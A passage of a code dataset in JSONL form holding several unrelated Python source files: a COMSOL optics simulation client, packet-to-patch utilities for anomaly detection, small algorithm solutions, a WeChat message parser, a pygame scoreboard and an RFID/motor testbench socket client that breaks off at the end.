\"cs\"\n ).feature(\"dDef\").label(\"Direct 1\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i2\").label(\n \"Suggested Iterative Solver (ewfd2) 2\"\n )\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i2\").set(\"linsolver\", \"fgmres\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i2\").feature(\"ilDef\").label(\n \"Incomplete LU 1\"\n )\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i2\").feature(\"mg1\").label(\n \"Multigrid 1.1\"\n )\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i2\").feature(\"mg1\").feature(\n \"pr\"\n ).label(\"Presmoother 1\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i2\").feature(\"mg1\").feature(\n \"pr\"\n ).feature(\"soDef\").label(\"SOR 1\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i2\").feature(\"mg1\").feature(\n \"pr\"\n ).feature(\"sv1\").label(\"SOR Vector 1.1\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i2\").feature(\"mg1\").feature(\n \"pr\"\n ).feature(\"sv1\").set(\"sorvecdof\", [\"comp1_E2\"])\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i2\").feature(\"mg1\").feature(\n \"po\"\n ).label(\"Postsmoother 1\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i2\").feature(\"mg1\").feature(\n \"po\"\n ).feature(\"soDef\").label(\"SOR 1\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i2\").feature(\"mg1\").feature(\n \"po\"\n ).feature(\"sv1\").label(\"SOR Vector 1.1\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i2\").feature(\"mg1\").feature(\n \"po\"\n ).feature(\"sv1\").set(\"sorvecdof\", [\"comp1_E2\"])\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i2\").feature(\"mg1\").feature(\n \"cs\"\n ).label(\"Coarse Solver 1\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i2\").feature(\"mg1\").feature(\n \"cs\"\n ).feature(\"dDef\").label(\"Direct 1\")\n model.java.sol(\"sol1\").runAll()\n\n model.java.result().numerical(\"int1\").label(\"LightToHeat\")\n model.java.result().numerical(\"int1\").set(\"table\", \"tbl2\")\n model.java.result().numerical(\"int1\").set(\"expr\", [\"ewfd2.Qh/(I0*w*w)\"])\n model.java.result().numerical(\"int1\").set(\"unit\", [\"1\"])\n model.java.result().numerical(\"int1\").set(\"descr\", [\"\"])\n model.java.result().numerical(\"gev1\").label(\n \"Reflectance, Transmittance, and Absorptance (ewfd)\"\n )\n model.java.result().numerical(\"gev1\").set(\"table\", \"tbl1\")\n model.java.result().numerical(\"gev1\").set(\n \"expr\",\n [\n \"ewfd.Rorder_0_0\",\n \"ewfd.Rtotal\",\n \"ewfd.Torder_0_0\",\n \"ewfd.Ttotal\",\n \"ewfd.RTtotal\",\n \"ewfd.Atotal\",\n ],\n )\n model.java.result().numerical(\"gev1\").set(\"unit\", [\"1\", \"1\", \"1\", \"1\", \"1\", \"1\"])\n model.java.result().numerical(\"gev1\").set(\n \"descr\",\n [\n \"Reflectance, order [0,0]\",\n \"Total reflectance\",\n \"Transmittance, order [0,0]\",\n \"Total transmittance\",\n \"Total reflectance and transmittance\",\n \"Absorptance\",\n ],\n )\n\n model.java.result().numerical(\"int1\").setResult()\n model.java.result().numerical(\"gev1\").setResult()\n model.java.result(\"pg1\").label(\"Electric Field (ewfd)\")\n model.java.result(\"pg1\").set(\"frametype\", \"spatial\")\n model.java.result(\"pg1\").feature(\"mslc1\").set(\"smooth\", \"internal\")\n model.java.result(\"pg1\").feature(\"mslc1\").set(\"resolution\", \"normal\")\n model.java.result(\"pg2\").label(\"Polarization Plot (ewfd)\")\n model.java.result(\"pg2\").set(\"looplevelinput\", [\"manual\"])\n model.java.result(\"pg2\").set(\"titletype\", \"manual\")\n model.java.result(\"pg2\").set(\"title\", \"Polarization states, Color: Phase (Radians)\")\n model.java.result(\"pg2\").feature(\"plz1\").set(\"linewidth\", Integer(2))\n model.java.result(\"pg2\").feature(\"plz1\").set(\"linewidthslider\", Integer(2))\n model.java.result(\"pg2\").feature(\"plz1\").set(\"legend\", JBoolean(True))\n model.java.result(\"pg2\").feature(\"plz1\").set(\"legendmethod\", \"manual\")\n model.java.result(\"pg2\").feature(\"plz1\").set(\"legends\", [\"Reflection\"])\n model.java.result(\"pg2\").feature(\"plz2\").set(\"linestyle\", \"dashed\")\n model.java.result(\"pg2\").feature(\"plz2\").set(\"linewidth\", Integer(2))\n model.java.result(\"pg2\").feature(\"plz2\").set(\"linewidthslider\", Integer(2))\n model.java.result(\"pg2\").feature(\"plz2\").set(\"legend\", JBoolean(True))\n model.java.result(\"pg2\").feature(\"plz2\").set(\"legendmethod\", \"manual\")\n model.java.result(\"pg2\").feature(\"plz2\").set(\"legends\", [\"Transmission\"])\n model.java.result(\"pg3\").label(\"Electric Field (ewfd2)\")\n model.java.result(\"pg3\").set(\"frametype\", \"spatial\")\n model.java.result(\"pg3\").feature(\"mslc1\").set(\"smooth\", \"internal\")\n model.java.result(\"pg3\").feature(\"mslc1\").set(\"resolution\", \"normal\")\n\n # Post\n\n model.java.result().numerical(\"int1\").label(\"LightToHeat\")\n # model.java.result().numerical(\"int1\").set(\"table\", \"tbl13\")\n model.java.result().numerical(\"int1\").set(\"expr\", [\"ewfd2.Qh/(I0*w*w)\"])\n model.java.result().numerical(\"int1\").set(\"unit\", [\"1\"])\n model.java.result().numerical(\"int1\").set(\"descr\", [\"\"])\n model.java.result().numerical(\"int1\").setResult()\n model.java.result(\"pg1\").feature(\"surf1\").set(\"resolution\", mesh_resolution)\n\n print(\"Running study...\")\n # model.java.study(\"std1\").run()\n\n if model_path:\n model.save(model_path)\n\n print(model.java.result().numerical(\"int1\").computeResult()[0][0][0])\n printElapsedTime(startTime, \"finish\")\n\n return float(model.java.result().numerical(\"int1\").computeResult()[0][0][0])\n","repo_name":"larsnolden/plasmonic_antennas_ga","sub_path":"Genetic Algorithm/comsolClient.py","file_name":"comsolClient.py","file_ext":"py","file_size_in_byte":62701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"41125141462","text":"import torch \nimport numpy as np \nimport pandas as pd\n\n#############################################################################\n################################## UTILS ####################################\nclass AverageMeter(object):\n r\"\"\"Computes and stores the average and current value\n \"\"\"\n def __init__(self, name, fmt=':f'):\n self.name = name\n self.fmt = fmt\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\n def __str__(self):\n fmtstr = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'\n return fmtstr.format(**self.__dict__)\n\nclass ProgressMeter(object):\n def __init__(self, num_batches, *meters, prefix=\"\"):\n self.batch_fmtstr = self._get_batch_fmtstr(num_batches)\n self.meters = meters\n self.prefix = prefix\n\n def print(self, batch):\n entries = [self.prefix + self.batch_fmtstr.format(batch)]\n entries += [str(meter) for meter in self.meters]\n print('\\t'.join(entries))\n\n def _get_batch_fmtstr(self, num_batches):\n num_digits = len(str(num_batches // 1))\n fmt = '{:' + str(num_digits) + 'd}'\n return '[' + fmt + '/' + fmt.format(num_batches) + ']'\n\ndef accuracy(output, target, topk=(1,)):\n r\"\"\"Computes the accuracy over the $k$ top predictions for the specified values of k\n \"\"\"\n with torch.no_grad():\n maxk = max(topk)\n batch_size = target.size(0)\n _, idx = output.sort(descending=True)\n \n pred = idx[:,:maxk]\n \n pred = pred.t()\n correct = pred.eq(target.t())\n\n res = []\n for k in topk:\n correct_k = correct[:k].reshape(-1).float().sum(0, keepdim=True)\n res.append(correct_k.mul_(100.0 / batch_size))\n return res\n\ndef just_convert_to_bin(number):\n if type(number) == str: # 문자열의 경우 \n binary_value = \"\"\n \n for char in number :\n binary_value += bin(ord(char)).lstrip(\"0b\")\n \n binary_value = binary_value\n return binary_value\n \n elif type(number) == int: # 정수형의 경우 그냥 binary로 바꾸고 '0b'제거 \n return bin(number).lstrip(\"0b\")\n \n else:\n float_length = 64\n formatted_number = \"{:.64f}\".format(number)\n \n # 필요한 만큼 타입 변환 \n dec, float_number = str(formatted_number).split(\".\")\n \n # 정수부는 이진수로 바로 바꿈 \n dec = int(dec)\n res = bin(dec).lstrip(\"0b\")\n \n # 소수부 연산 처리 \n while(len(res) < float_length):\n float_number = float(\"0.\" + float_number) \n float_number = float_number * 2\n float_number = \"{:.64f}\".format(float_number)\n dec, float_number = str(float_number).split(\".\")\n res += dec\n return res\n\ndef make_patch(item, patch_size):\n '''\n item should be a np.ndarray \n '''\n patch = \"\"\n total_length = patch_size[0] * patch_size[1]\n\n for elem in item : \n patch += just_convert_to_bin(elem)\n\n while(len(patch) < total_length) : # patch사이즈를 일정하게 만드는 거 \n patch+= \"0\"\n\n patch = list(map(int, patch))\n patch = np.array(patch)[:total_length] # 만약 바이너리로 변형한 부분이 packet 사이즈 보다 크면 뒤는 버려버리는 것 \n\n return patch.reshape(patch_size)\n\nclass PacketFeature:\n def __init__(self, feature_size):\n self.frame = np.zeros(feature_size)\n self.fsize = feature_size\n # print(\"Frame shape : \", self.frame.shape)\n # print(\"Frame size : \", self.fsize)\n self.patch_count = 0\n\n def append(self, patch):\n size = patch.shape # Ex 32 * 32\n stride = size[0]\n try:\n if ((self.fsize[0] % stride) == 0):\n pass\n else : \n raise\n except:\n print(\"frame size and patch size unmatched\")\n return\n \n if(self.patch_count >= stride*stride):\n self.patch_count = 0\n \n count = self.fsize[0] // stride\n row = self.patch_count//count # 만약 self.patch_count = 3 이면 patch row는 0~31에 내용이 들어가야하고 col에는 96~127에 있어야지 \n col = self.patch_count % count\n\n for row_stride in range(stride):\n current_row = row*stride + row_stride\n current_col_start = col*stride\n current_col_end = current_col_start + stride\n\n self.frame[current_row][current_col_start:current_col_end] = patch[row_stride]\n \n self.patch_count = self.patch_count + 1\n#############################################################################\n#############################################################################","repo_name":"alstjrdld1/Anomaly_detection","sub_path":"code/my_utils.py","file_name":"my_utils.py","file_ext":"py","file_size_in_byte":5039,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"11462600234","text":"# a=[36,9,13,27,43,25,44,48,12,40,37,20,26,36,1,20,19,14,28,38,39,42,21,30,29,29,44,14,33,31,48,11,43,6,19,33,43,41,40,22,6,49,16,44,20,15,13,10,2,3,16,31,40,50,5,30,27,41,37,13,46,45,25,32,26,16,10,42,45,1,49,50,7,50,28,15,12,45,34,30,4,36,16,8,30,9,30,43,34,36,39,21,49,29,40,47,33,28,36,29]\n# # a = [1,2,3]\n# n = len(a)\n# for i in range(n):\n# for j in range(i,n):\n# subarr = a[i:j+1]\n# # print(subarr)\n# tmp = sum(subarr)*min(subarr)\n# if tmp == 10374:\n# print(\"aa\",i,j)\n# print(subarr, sum(subarr))\n\n\"\"\"\nuse a monostack. we know the ple and nle when we pop\nthen we just use a prefix sum array to find the prodsum\nuse n+1 for emptying the stack trick\n\"\"\"\n\nclass Solution:\n def maxSumMinProduct(self, nums: List[int]) -> int:\n # min in how many subarrays\n # for this we can use a mono inc stack\n # then while we pop we can add if increasing we make it yeyeye\n n = len(nums)\n \n pref = [0]\n tmp = 0\n for i in range(n):\n tmp+=nums[i]\n pref.append(tmp)\n \n \n stack = []\n ans = float(\"-inf\")\n for i in range(n+1):\n ple = -1\n # ple = i-1\n mx = float(\"-inf\")\n while stack and (i==n or nums[stack[-1]] >= nums[i]):\n idx = stack.pop()\n ple = -1\n \n if stack:\n ple = stack[-1]\n cursum = pref[i] - pref[ple+1]\n ans = max(ans, cursum*nums[idx])\n \n stack.append(i)\n # print(stack)\n mod = (10**9) + 7\n return ans % mod\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Johnkhk/Algorithms","sub_path":"subarrays/1856. Maximum Subarray Min-Product.py","file_name":"1856. Maximum Subarray Min-Product.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"41050935219","text":"import xml.etree.ElementTree as ET\n\nclass Msg(object):\n def __init__(self, xml_data):\n self.ToUserName = xml_data.find('ToUserName').text\n self.FromUserName = xml_data.find('FromUserName').text\n self.CreateTime = xml_data.find('CreateTime').text\n self.MsgType = xml_data.find('MsgType').text\n\n\nclass TextMsg(Msg):\n def __init__(self, xml_data):\n super(TextMsg, self).__init__(xml_data)\n self.Content = xml_data.find('Content').text\n self.MsgId = xml_data.find('MsgId').text\n\n\nclass EventMsg(Msg):\n def __init__(self, xml_data):\n super(EventMsg, self).__init__(xml_data)\n self.Event = xml_data.find('Event').text\n\n\nclass EventSubscribeMsg(EventMsg):\n \"\"\" 关注事件消息 \"\"\"\n def __init__(self, xml_data):\n super(EventSubscribeMsg, self).__init__(xml_data)\n\n\nclass EventClickMsg(EventMsg):\n \"\"\" 菜单点击事件消息 \"\"\"\n def __init__(self, xml_data):\n super(EventClickMsg, self).__init__(xml_data)\n self.EventKey = xml_data.find('EventKey').text\n\n\nclass EventViewMsg(EventMsg):\n \"\"\" 菜单浏览事件消息 \"\"\"\n def __init__(self, xml_data):\n super(EventViewMsg, self).__init__(xml_data)\n self.EventKey = xml_data.find('EventKey').text\n self.MenuId = xml_data.find('MenuId').text\n\n\nclass MsgFactory(object):\n @staticmethod\n def parse_xml_string_to_msg(xml_string):\n if len(xml_string) == 0:\n return None\n xml_data = ET.fromstring(xml_string)\n msg_type = xml_data.find('MsgType').text\n if msg_type == 'text':\n return TextMsg(xml_data)\n elif msg_type == 'event':\n event_msg = EventMsg(xml_data)\n if event_msg.Event == 'subscribe': # 订阅事件消息\n return EventSubscribeMsg(xml_data)\n elif event_msg.Event == 'CLICK': # 点击菜单事件\n return EventClickMsg(xml_data)\n elif event_msg.Event == \"VIEW\": # 菜单浏览事件\n return EventViewMsg(xml_data)\n\n return None\n","repo_name":"yiyuhao/FukuanUnion","sub_path":"payserver/padmin/subscription_account_reply/wechat_msg.py","file_name":"wechat_msg.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"22804982544","text":"from pytopojson import identity\n\n\nclass Untransform(object):\n def __init__(self):\n self.identity = identity.Identity()\n self.x_0 = 0\n self.y_0 = 0\n self.k_x = 0\n self.k_y = 0\n self.d_x = 0\n self.d_y = 0\n\n def __call__(self, transform=None, *args, **kwargs):\n if transform is None:\n return self.identity\n\n self.k_x, self.k_y = transform[\"scale\"]\n self.d_x, self.d_y = transform[\"translate\"]\n\n return self.func\n\n def func(self, input, i=None):\n if i is None or i == 0:\n self.x_0, self.y_0 = 0, 0\n output = input.copy()\n\n x_1 = int(round((input[0] - self.d_x) / self.k_x))\n y_1 = int(round((input[1] - self.d_y) / self.k_y))\n output[0] = x_1 - self.x_0\n output[1] = y_1 - self.y_0\n self.x_0 = x_1\n self.y_0 = y_1\n\n return output\n","repo_name":"fferrin/pytopojson","sub_path":"pytopojson/untransform.py","file_name":"untransform.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"7"} +{"seq_id":"23444454673","text":"from init import *\r\nfrom mod1 import *\r\nimport sys\r\n\r\n\r\n\r\ndef main():\r\n sys.stdout.write(\"\\033[2J\\033[H\")\r\n sys.stdout.flush()\r\n #array = [[O for i in range(32)] for j in range(16)] #32*16 array\r\n wire = [0,0,2,0,0,1,[],[12,12],[12,12],[1,1,1],[1,1,1]]\r\n #start/switch/player_now/wind_now/atkmode/pow/bullet_pos/HP1/HP2/skill_remain1/skill_remain2\r\n data1 = [12,[1,1,1]] #HP/skill_remain\r\n data2 = [12,[1,1,1]]\r\n\r\n init(wire)\r\n module1(wire,data1,data2)\r\n\r\nmain()\r\n","repo_name":"photon00/ICLab","sub_path":"python_simulation/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"17254417804","text":"import pygame.font\n\n\nclass Scoreboard():\n # 显示的分信息的类\n def __init__(self, ai_settings, screen, stats):\n self.screen = screen\n self.screen_rect = screen.get_rect()\n self.ai_settings = ai_settings\n self.stats = stats\n\n # 显示得分信息的字体\n self.text_color = (30, 30, 30)\n self.font = pygame.font.SysFont(None,48)\n #准备初始得分图像\n def prer_score(self):\n '''把得分弄成图像'''\n rounded_score = int(round(self.stats.score,-1))\n score_str = \"{:,}\".format(rounded_score)\n self.score_image = self.font.render(score_str,True,self.text_color,self.ai_settings.bg_color)\n #得分放到右上角\n self.score_rect = self.score_image.get_rect()\n self.score_rect.right = self.screen_rect.right - 20\n self.score_rect.top = 20\n def prer_score1(self):\n '''最高分'''\n rounded_score = int(round(self.stats.h_score,-1))\n score_str = \"{:,}\".format(rounded_score)\n self.score_image = self.font.render(score_str,True,(80, 225, 30),self.ai_settings.bg_color)\n #得分放到左上\n self.score_rect = self.score_image.get_rect()\n self.score_rect.left = self.screen_rect.left + 20\n self.score_rect.bottom = self.screen_rect.bottom\n def show_score(self):\n self.screen.blit(self.score_image,self.score_rect)\n","repo_name":"Aiden-Xu/ALIEN","sub_path":"scoreboard.py","file_name":"scoreboard.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"17435295945","text":"def solve(n):\n dp = dict()\n dp[0] = 0\n dp[1] = 1\n dp[2] = 2\n dp[3] = 3\n dp[4] = 4\n dp[5] = 5\n dp[6] = 6\n for i in range(6, n+1):\n dp[i] = max(dp[i-1]+1, dp[i-3]*2, dp[i-4]*3, dp[i-5]*4, dp[i-6]*5)\n return dp[n]\n\ndef run():\n import sys\n read = sys.stdin.readline\n n = int(read().replace(\"\\n\", \"\"))\n print(solve(n))\n\nrun()\n# print(solve(10))","repo_name":"jeemyeong/problem-solving","sub_path":"src/boj/boj11058/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"31790975965","text":"import logging\n\n\nloggers_dict = {}\n\n\ndef get_logger(name=None, console_level=logging.INFO):\n global loggers_dict\n\n if name is None:\n name = \"BaseLogger\"\n\n if name in loggers_dict:\n logger = loggers_dict[name]\n else:\n logger = logging.getLogger(name)\n logger.setLevel(logging.DEBUG)\n\n file_handler = logging.FileHandler(f\"logs/runtime.log\", \"a\")\n file_handler.setFormatter(logging.Formatter(\"%(asctime)s : %(levelname)s : %(name)s : %(message)s\"))\n logger.addHandler(file_handler)\n\n console_handler = logging.StreamHandler()\n console_handler.setLevel(console_level)\n console_handler.setFormatter(logging.Formatter(\"%(message)s\"))\n logger.addHandler(console_handler)\n\n loggers_dict[name] = logger\n\n return logger\n","repo_name":"MB0390231/facebook_asset_performance_tracker_for_clickup","sub_path":"helpers/logging_config.py","file_name":"logging_config.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"19753131905","text":"#!/usr/bin/python3\nimport socket\nimport sys\nimport time\nimport os.path\nimport shutil\nfrom pathlib import Path\nimport csv\nimport datetime\nimport select\n\nCSVIN_HEADER = \"Motor Speed(rpm);Measure Time(sec);Measure Rep;RFID Power(dbm);\\n\"\nCSVIN_EXEMPLE = \"100;60;1;13;\\n\"\nCSV_DELIMITER = ';'\nCSV_EXEMPLE_FILE = \"exemple-csv-in.csv\"\nTMP_DIR = \".tmp\"\n\nHOST = '192.168.1.20'\nPORT = 12345\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nconnected = False\n\n#typedef enum {CMD_RFID=0, CMD_MOTOR, INFO_RFID, INFO_MOTOR} packet_type;\nCMD_RFID = 0x00\nCMD_MOTOR = 0x01\nINFO_RFID = 0x02\nINFO_MOTOR = 0x03\nRFID_DIRECT = 0x04\n\n#typedef enum {CMD_CHANGE_SPEED=0, CMD_GET_SPEED, CMD_SIGNAL_STABLE_SPEED} motor_cmd_type_t;\nCMD_SIGNAL_STABLE_SPEED = 0x02\n\n\nST_COM_WRITE_REG = 0x68\nCMD_TAG_DETECTED = 0x16\n\ndef csv_parser(csvPath):\n with open(csvPath, 'r') as csvF:\n rd = csv.DictReader(csvF, delimiter=';')\n line = 0\n skiped = 0\n testlist = []\n for row in rd:\n line += 1\n try:\n d = dict()\n d['testnum'] = line\n speed = int(row['Motor Speed(rpm)'])\n if not (100 <= speed <= 500) and (speed != 0): \n print(\"Warning: {}:{} the field 'Motor Speed(rpm)' need to be in range [100:500] rpm or 0 rpm -- skip test\".format(csvPath, line))\n skiped += 1\n continue\n d['speed'] = speed\n d['duration'] = int(row['Measure Time(sec)'])\n d['repetition'] = int(row['Measure Rep'])\n\n power = int(row['RFID Power(dbm)'])\n if not (1 <= power <= 20):\n s.makedirs(directory)\n print(\"Warning: {}:{} the field 'RFID Power(dbm)' need to be in range [1:20] dbm -- skip test\".format(csvPath, line))\n skiped += 1\n continue\n d['power'] = power \n testlist.append(d)\n except ValueError:\n print(\"Warning: {}:{} contain a field that is not a number -- skip test\".format(csvPath, line))\n skiped += 1\n continue\n \n if(skiped):\n print(\"{}/{} will be skiped. do you still want to proceed? (Yes/n)\".format(skiped, line))\n if input() != \"Yes\":\n exit()\n\n return testlist\n\n# Write the result to the output csv file\ndef write_result(csvPath, result):\n pass\n\n# Connect to the testbench server\ndef connect(addr, port):\n try:\n server.connect((addr, port))\n server.setblocking(0)\n print('Connexion vers ' + addr + ':' + str(port) + ' reussie.')\n connected = True\n except ConnectionRefusedError:\n print(\"Error: Could not connect to {}:{}. Make sure the server is started\".format(addr, port))\n exit()\n\n# Disconnect from the testbench server\ndef disconnect():\n global connected\n print ('Deconnexion.')\n if(connected):\n server.close()\n connected = False\n\n# Handle exiting potentially in the middle of a test, the scan, motor and server connection need to be stoped if possible\ndef cleanExit():\n disconnect()\n exit()\n\n# Get the following incoming cmd on the network\ndef get_cmd(): \n cmd_detected = False\n timeout = False\n cmd_size = -1\n cmd_type = -1\n magic = 0\n magic_detected = False\n frame = []\n cmd = dict()\n while not cmd_detected:\n ready = select.select([server], [], [], 0.5)\n if ready[0]:\n byte = server.recv(1)\n\n value = int(byte[0])\n #print('value:{}'.format(hex(byte[0])))\n magic = ((magic>>8) | value<<24) & 0xFFFFFFFF\n #print('magic is {}'.format(hex(magic)))\n if(magic == 0x41421356):\n magic_detected=True\n continue\n \n if(magic_detected):\n #print('value:{}'.format(hex(value)))\n frame.append(value)\n\n if(len(frame) == 3):\n cmd_type = frame[0]\n cmd_size = (frame[1] | frame[2]<<8) & 0xFFFF\n cmd[\"type\"] = cmd_type\n cmd[\"size\"] = cmd_size\n #print(\"size: \" + str(cmd_size))\n elif(len(frame) > 3):\n cmd_size -=1\n if(cmd_size == 0):\n cmd_detected = True\n else:\n #print(\"timeout\")\n timeout = True\n return -1\n\n #print(\"Command detected: {}\".format(frame))\n cmd[\"data\"] = frame[3:]\n \n return cmd\n# Send the command to change the motor speed and wait until the speed as been reached\ndef motor_speed(speed):\n clockwise = 1\n if(speed<0):\n speed = abs(speed)\n clockwise = 0\n\n # MAGIC type size type argc arg[...]\n command_motor = bytes([ 0x41, 0x42, 0x13, 0x56, 1, 0, 5, 0, 3, speed>>8, speed&0xFF, clockwise])\n\n n = server.send(command_motor)\n if (n != len(command_motor)):\n print ('Erreur envoi.')\n cleanExit()\n\n stabelised = False\n while(not stabelised):\n cmd = get_cmd()\n if(cmd != -1 and cmd[\"type\"] == INFO_MOTOR and cmd[\"data\"][0] == CMD_SIGNAL_STABLE_SPEED):\n stabelised = True\n\ndef dbm_to_reg(dbm):\n value = 0\n if(dbm >= 9):\n value = 20-dbm\n elif(dbm < 9):\n value = 0x10 + (8-dbm)\n\n #define ST25RU3993_REG_MODULATORCONTROL3_VALUE 0x00; // 0dB, 20dBm\n #define ST25RU3993_REG_MODULATORCONTROL3_VALUE 0x07; // -7dB, 13dBm\n #define ST25RU3993_REG_MODULATORCONTROL3_VALUE 0x08; // -8dB, 12dBm\n #define ST25RU3993_REG_MODULATORCONTROL3_VALUE 0x09; // -9dB, 11dBm\n #define ST25RU3993_REG_MODULATORCONTROL3_VALUE 0x0A; // -10dB, 10dBm\n #define ST25RU3993_REG_MODULATORCONTROL3_VALUE 0x0B; // -11dB, 9dBm\n #define ST25RU3993_REG_MODULATORCONTROL3_VALUE 0x10; // -12dB, 8dBm\n #define ST25RU3993_REG_MODULATORCONTROL3_VALUE 0x11; // -13dB, 7dBm\n #define ST25RU3993_REG_MODULATORCONTROL3_VALUE 0x12; // -14dB, 6dBm\n #define ST25RU3993_REG_MODULATORCONTROL3_VALUE 0x13; // -15dB, 5dBm\n #define ST25RU3993_REG_MODULATORCONTROL3_VALUE 0x14; // -16dB, 4dBm\n #define ST25RU3993_REG_MODULATORCONTROL3_VALUE 0x15; // -17dB, 3dBm\n #define ST25RU3993_REG_MODULATORCONTROL3_VALUE 0x16; // -18dB, 2dBm\n #define ST25RU3993_REG_MODULATORCONTROL3_VALUE 0x17; // -19dB, 1dBm\n return value\n\n# Send command to RFID board \ndef rfid_set(param, value):\n command = []\n if(param == \"scan\"): \n # MAGIC type size type argc arg[...]\n command = [ 0x41, 0x42, 0x13, 0x56, 0, 0, 3, 0x17, 1, 0]\n if(value):\n #print(\"Start scan\")\n command[9] = 1\n else:\n #print(\"Stop scan\")\n command[9] = 0\n\n if(param == \"power\"):\n reg = dbm_to_reg(value)\n # MAGIC type size TID reserved payload protocol tx-msb-lsb rx-msb-lsb data[@ value] \n command = [ 0x41, 0x42, 0x13, 0x56, RFID_DIRECT, 0, 11, 0x00, 0x00, 0x00,0x07, ST_COM_WRITE_REG, 0x00,0x02, 0x00,0x00, 0x15, reg]\n\n n = server.send(bytes(command))\n if (n != len(command)):\n print ('Erreur envoi.')\n\ndef timestampMS():\n return int((datetime.datetime.utcnow() - datetime.datetime(1970, 1, 1)).total_seconds() * 1000)\n\n# Start a test with the specified parameters\ndef start_test(params):\n motor_speed(params[\"speed\"])\n rfid_set(\"power\", params[\"power\"])\n result = []\n\n for rep in range(params[\"repetition\"]):\n result.append([\"Repetition\",rep+1])\n rfid_set(\"scan\", True)\n #wait to make sure we get data straight away\n #time.sleep(0.5)\n \n #start timer\n start_time = timestampMS()\n elapsed_time = timestampMS() - start_time\n timestamp_first = 0\n\n while(elapsed_time < params[\"duration\"]*1000):\n elapsed_time = timestampMS() - start_time\n #print(\"Elapsed time: {} sec\".format(elapsed_time))\n # retrieve scan informations\n cmd = get_cmd()\n #print(\"type:{} sub-type:{} INFO_RFID:{} CMD_TAG_DETECTED:{}\".format(cmd[\"type\"], cmd[\"data\"][0], INFO_RFID, CMD_TAG_DETECTED))\n if( cmd!= -1 and (cmd[\"type\"] == INFO_RFID) and (cmd[\"data\"][0] == CMD_TAG_DETECTED)):\n timestamp = 0\n for i,value in enumerate(cmd[\"data\"][1:8]):\n #print(\"value[{}]: {}\".format(i, hex(value)))\n timestamp = timestamp | (value << (i*8)) & 0xFFFFFFFFFFFFFFFF\n tag = (cmd[\"data\"][9] | cmd[\"data\"][10] << 8) & 0xFFFF\n \n if timestamp_first == 0:\n timestamp_first = timestamp\n\n timestamp -= timestamp_first\n\n result.append([timestamp ,tag])\n #print(\"Timestamp:{} tag:{}\".format(timestamp, tag))\n \n\n #stop scan\n rfid_set(\"scan\", False)\n result.append([\"\",\"\"])\n time.sleep(1)\n \n #purge previous scan\n while(get_cmd() != -1):\n pass\n\n # maybe reset to default state ?\n \n return result\n\ndef save_tmp(result, testlist):\n# print(\"save result\")\n # create the file if it doesn't exist and append it if it does\n with open(\"{}/tmp_{}.csv\".format(TMP_DIR,testlist[\"testnum\"]), 'w+') as resFile:\n writer = csv.writer(resFile, delimiter=';')\n writer.writerow([\"Test #{}\".format(testlist[\"testnum\"]),'','','','',''])\n header = CSVIN_HEADER[:-1].split(';')\n header.append('')\n writer.writerow(header)\n writer.writerow([testlist['speed'], testlist['duration'], testlist['repetition'], testlist['power'],'',''])\n writer.writerow(['timer(ms)', 'RFID detection','','','',''])\n for row in result:\n row.extend(['','','',''])\n writer.writerow(row)\n resFile.close() \n\ndef clear_tmp_file():\n if Path(TMP_DIR).is_dir():\n shutil.rmtree(TMP_DIR)\n os.makedirs(TMP_DIR)\n\ndef combine_tmp_file(csvOut):\n path, dirs, files = next(os.walk(TMP_DIR))\n file_count = len(files)\n file_data = []\n prepend_col = 0\n\n for filenum in range(file_count):\n file_path = \"{}/tmp_{}.csv\".format(TMP_DIR,filenum+1)\n\n with open(file_path) as f:\n rd = csv.reader(f)\n for num, row in enumerate(rd):\n try:\n file_data[num][0] += row[0]\n except IndexError:\n row[0] = prepend_col*\";\" + row[0]\n file_data.append(row)\n\n prepend_col += 5\n\n with open(csvOut,'w+') as resfile:\n wr = csv.writer(resfile)\n for row in file_data:\n wr.writerow(row)\n\n\n# Helper function to output an exemple csv input file with the correct format\ndef create_exemple():\n with open(CSV_EXEMPLE_FILE, 'w') as exempleFile:\n exempleFile.write(CSVIN_HEADER)\n exempleFile.write(CSVIN_EXEMPLE)\n exempleFile.close()\n\n#------------------- Entry point --------------------#\nsys.argv = [\".\\testbench.py\",\"exemple-csv-in.csv\",\"result.csv\"]\nif len(sys.argv) != 3:\n print(\"Wrong number of arguments\")\n print(\"Usage: {} .csv 